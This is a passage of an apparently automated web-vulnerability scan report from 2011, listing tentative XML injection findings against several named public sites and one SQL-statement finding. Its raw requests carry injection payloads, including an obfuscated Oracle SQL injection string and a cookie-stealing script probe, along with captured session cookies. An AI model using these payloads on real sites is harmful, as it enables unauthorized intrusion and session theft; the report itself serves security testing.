Cookie: xltl=eJxLtDKyqi62MrZSCvV0UbIGsoyslEwSE02STSwtzRPNU03MkiwsktMMUpItzCzSkgwtTFMNwOqslHyCnJWsM60MTSxNDcxMLa1rASUaFEk%253D; myPAL=eJx9kLtuwzAMRf%252FFXDmQ1IOSPLk1CgSIDaR1i6wdM3ds%252B%252B%252BlrNrJEGTS6%252FBQvJ%252BFqXxfCvVfRbR07GOGnDMDkweKBIttJruRrr8UrlismIZ%252FTAmI2DCljZJdtlP3ZM4wv8pSAEnBaUZHolYkPqzW4WnBw%252FyBr9MZn48TDuO5Vvq9QdIHDcIVSzdYatiyYdEwTreYEIFPEeqr3pUwNcn7JkkVa5ItQHU2g8CbkLd%252F%252FxBXLhsXV11es%252FGYRSkwCgmFenAc22IxuBbDONjs42lecDzML1hTsTS6%252FvcPkKZiCA%253D%253D; BFF=eJytk81ugzAQhN%252BFJ%252FBvFptLaKOqSEDVxonSU5Vjzjm2ffeuCSRrtD5Qcf1mPAZ55uyV899XL4UvghSm2zrnVFFdvDQlVChoX3RvfXhtP7%252BOzb4JRXX2RuXObByesSMnKPFqIrjIQZAIsIjNDRMSE%252BqnsFWl1eDGL4yCHjgBk1MLBWBnQtMf2QjkjJON%252BOhObARyxinxf0ExApv93HZsNnLGyUbUOyZbD5w61fQgyXWQSEkMkGcMtCbl48kDQVPM7MlSKbmhJDccMjcccl5NBTTvlTD4yz9CRnUzqlMXHyoV1F2Yn4G7QiB2d1e3Q6XNDbuxuxETEo3vfeCMiGfGpn%252FhjIgJmTruFAgr04RhJUIJm%252BKhWgn%252B5XcJNr%252FL7AqXj275xlac1PIFrTyYldfx3ynkG58pd6bKmeKuU9M%252FggaTAQ%253D%253D; TFF=eJydlDGOxCAMRe8yJzA2xDZpcoxtU6QYabvdbjR3X5JJYARk5GwREaH%252F%252FG1jmCMN8fETHcabAz%252FBAJOq4m2cI8bHPboxfV44LbD9Djo%252BG71b9VTpMX2%252B4jhjNiKt4Cul7Mqhjb18Ld%252Fz71LF1rATiL0yGCYA1yubQ9an31Zfl82Hkas4zpiNSCuDMfaaE%252FpwVoOUGuSl90WPEoi1PorWqSWdKjH%252BhyRA5mAlOYM2Iu35YM3qGGLpD70UvXT0TUbS%252Bsj70Esz9GfEdqYAk5fhsxO2VjtnRNImgDX60QAH1xq26682LGFXGuaY0pxgNzMteu3om8y09cnv1wuzEetFJmPs7ZLQh%252Bul7SBreQIoPwHezL05KjKEug%252FnJBUSAaG%252Bz1ZLcvWg2kmzJ2fQRqQ9Cibl8w%252FsddOa; EVX=eJyNyrsNgDAMRdFdMoE%252Fsey8DGOlTE2JsjsQShp0qyudAcU5IWHqrQ%252Fwc9QPcKBwDUtPqZZEnHelrwklcbefuImT8Re3jfXFdeN1AQqvJDc%253D

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Thu, 03 Feb 2011 16:15:37 GMT
Server: HTTP server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

8.12. http://s.ytimg.com/yt/cssbin/www-embed-vflPrzZNL.css [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s.ytimg.com
Path:   /yt/cssbin/www-embed-vflPrzZNL.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /yt/cssbin]]>>/www-embed-vflPrzZNL.css HTTP/1.1
Host: s.ytimg.com
Proxy-Connection: keep-alive
Referer: http://www.youtube.com/embed/aP2pdXfgWzM?rel=0
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=31104000
Expires: Sun, 26 Dec 2032 06:12:01 GMT
Content-Type: text/html
Content-Length: 345
Date: Thu, 03 Feb 2011 16:24:18 GMT
Server: lighttpd-yt/1.4.18

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

8.13. http://s.ytimg.com/yt/cssbin/www-embed-vflPrzZNL.css [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s.ytimg.com
Path:   /yt/cssbin/www-embed-vflPrzZNL.css

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /yt/cssbin/www-embed-vflPrzZNL.css]]>> HTTP/1.1
Host: s.ytimg.com
Proxy-Connection: keep-alive
Referer: http://www.youtube.com/embed/aP2pdXfgWzM?rel=0
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Thu, 03 Feb 2011 16:24:18 GMT
Server: lighttpd-yt/1.4.18

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

8.14. http://s.ytimg.com/yt/jsbin/www-embed-vfl4nNnFQ.js [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s.ytimg.com
Path:   /yt/jsbin/www-embed-vfl4nNnFQ.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /yt/jsbin]]>>/www-embed-vfl4nNnFQ.js HTTP/1.1
Host: s.ytimg.com
Proxy-Connection: keep-alive
Referer: http://www.youtube.com/embed/aP2pdXfgWzM?rel=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=31104000
Expires: Sun, 26 Dec 2032 06:12:01 GMT
Content-Type: text/html
Content-Length: 345
Date: Thu, 03 Feb 2011 16:24:20 GMT
Server: lighttpd-yt/1.4.18

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

8.15. http://s.ytimg.com/yt/jsbin/www-embed-vfl4nNnFQ.js [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s.ytimg.com
Path:   /yt/jsbin/www-embed-vfl4nNnFQ.js

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /yt/jsbin/www-embed-vfl4nNnFQ.js]]>> HTTP/1.1
Host: s.ytimg.com
Proxy-Connection: keep-alive
Referer: http://www.youtube.com/embed/aP2pdXfgWzM?rel=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Thu, 03 Feb 2011 16:24:21 GMT
Server: lighttpd-yt/1.4.18

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

8.16. http://urlwww--feedzilla--com.rtrk.com/tools/hcc.asp [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://urlwww--feedzilla--com.rtrk.com
Path:   /tools/hcc.asp

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tools]]>>/hcc.asp?callback=jsonp1296748868891&widgetId=2130113621124&widgetType=flash&hostUrl=http%3A%2F%2Fgsbmtg1-px.rtrk.com%2Fhome.html HTTP/1.1
Host: urlwww--feedzilla--com.rtrk.com
Proxy-Connection: keep-alive
Referer: http://gsbmtg1-px.rtrk.com/home.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319%26clk%3D1296748826%26dynamic_proxy%3D1%26primary_serv%3Dgsbmtg1-px.rtrk.com; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0; RlocalTiming=retarget%3D0%26retarget_off%3D0%26track_landing_pages%3D1%26landing_loadtime_off%3D1; NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7b45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 17:44:40 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: RlocalDYNPX=RLDYNPX%3Dwww.feedzilla.com; domain=.reachlocal.net; path=/
X-RL-Host: pweb108
X-Robots-Tag: noindex,nofollow
Set-Cookie: RlocalPROXYLog=RLPROXYLog%3d1; domain=.rtrk.com; path=/
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (l 0 s 0 v 0 o 0))
X-Powered-By: ASP.NET
Content-Type: text/html; Charset=iso-8859-1
Cache-control: private
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Set-Cookie: country=us;expires=Sat, 05-Mar-2011 17:44:40 GMT;path=/
Set-Cookie: ASPSESSIONIDQCDCDQCR=LBBJEDMACJOOEFNDAOEPBPEH;path=/
Vary: Accept-Encoding
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7d45525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 18:13:32 GMT;path=/;httponly
Content-Length: 26908


<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.o
...[SNIP]...

8.17. http://urlwww--feedzilla--com.rtrk.com/tools/swfobject.js [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://urlwww--feedzilla--com.rtrk.com
Path:   /tools/swfobject.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /tools]]>>/swfobject.js HTTP/1.1
Host: urlwww--feedzilla--com.rtrk.com
Proxy-Connection: keep-alive
Referer: http://gsbmtg1-px.rtrk.com/home.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319%26clk%3D1296748826%26dynamic_proxy%3D1%26primary_serv%3Dgsbmtg1-px.rtrk.com; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:32:08 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: RlocalDYNPX=RLDYNPX%3Dwww.feedzilla.com; domain=.reachlocal.net; path=/
X-RL-Host: pweb104
X-Robots-Tag: noindex,nofollow
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (l 0 s 0 v 0 o 0))
X-Powered-By: ASP.NET
Content-Type: text/html; Charset=iso-8859-1
Cache-control: private
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Set-Cookie: country=us;expires=Sat, 05-Mar-2011 16:32:08 GMT;path=/
Set-Cookie: ASPSESSIONIDQCDCDQCR=GFEBEDMALANMGCGFKICELPGM;path=/
Vary: Accept-Encoding
Set-Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7945525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:00:50 GMT;path=/;httponly
Content-Length: 27265


<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.o
...[SNIP]...

8.18. http://weather.weatherbug.com/ [zip parameter]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://weather.weatherbug.com
Path:   /

Issue detail

The zip parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the zip parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /?zip=75201]]>>&zcode=6292 HTTP/1.1
Host: weather.weatherbug.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
p3p: CP="NON DSP COR NID"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=UTF-8
Content-Length: 49365
Expires: Thu, 03 Feb 2011 16:34:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 16:34:33 GMT
Connection: close
Set-Cookie: wxbug_cookie1=lang_id=en-US&has_cookies=1; domain=weatherbug.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   
<title>Local and
...[SNIP]...
<?xml version="1.0"?>
...[SNIP]...

8.19. http://www.myfinances.com/solo [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.myfinances.com
Path:   /solo

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /solo]]>>?module=facebook/login&message_num=2 HTTP/1.1
Host: www.myfinances.com
Proxy-Connection: keep-alive
Referer: http://www.myfinances.com/budget.php?91d41%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3d8e0c43e90=1
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=VRWOZXS192.168.100.27CKOUJ; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; adc=RSP

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 16:26:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 16:26:51 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: adc=RSP; path=/;
Content-Length: 6533

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
<!-- START listxml Partial -->
...[SNIP]...

8.20. http://www.myfinances.com/solo/form/dispatcher [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.myfinances.com
Path:   /solo/form/dispatcher

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /solo]]>>/form/dispatcher HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:04:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:04:42 GMT
Content-Length: 6490
Connection: close
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
<!-- START listxml Partial -->
...[SNIP]...

8.21. http://www.myfinances.com/solo/form/dispatcher [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.myfinances.com
Path:   /solo/form/dispatcher

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /solo/form]]>>/dispatcher HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:04:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:04:53 GMT
Content-Length: 6490
Connection: close
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
<!-- START listxml Partial -->
...[SNIP]...

8.22. http://www.myfinances.com/solo/form/dispatcher [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.myfinances.com
Path:   /solo/form/dispatcher

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /solo/form/dispatcher]]>> HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:05:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:05:20 GMT
Content-Length: 6490
Connection: close
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
<!-- START listxml Partial -->
...[SNIP]...

9. SQL statement in request parameter  previous  next
There are 3 instances of this issue:

Issue description

The request appears to contain SQL syntax. If this is incorporated into a SQL query and executed by the server, then the application is almost certainly vulnerable to SQL injection.

You should verify whether the request contains a genuine SQL query and whether this is being executed by the server.

Issue remediation

The application should not incorporate any user-controllable data directly into SQL queries. Parameterised queries (also known as prepared statements) should be used to safely insert data into predefined queries. In no circumstances should users be able to control or modify the structure of the SQL query itself.


9.1. https://app.insightgrit.com/1/nat  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://app.insightgrit.com
Path:   /1/nat

Request

GET /1/nat?id=94375989827&ref=&z=217634&purl=https://www.supermedia.com/spportal/spportalFlow.do?_flowExecutionKey=%27%7C%7C(utl_inaddr.get_host_address((select+chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))%7C%7C%27 HTTP/1.1
Accept: */*
Referer: https://www.supermedia.com/spportal/spportalFlow.do?_flowExecutionKey=%27%7C%7C(utl_inaddr.get_host_address((select+chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))%7C%7C%27
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: app.insightgrit.com
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 302 Found
Date: Thu, 03 Feb 2011 18:59:42 GMT
Server: Apache
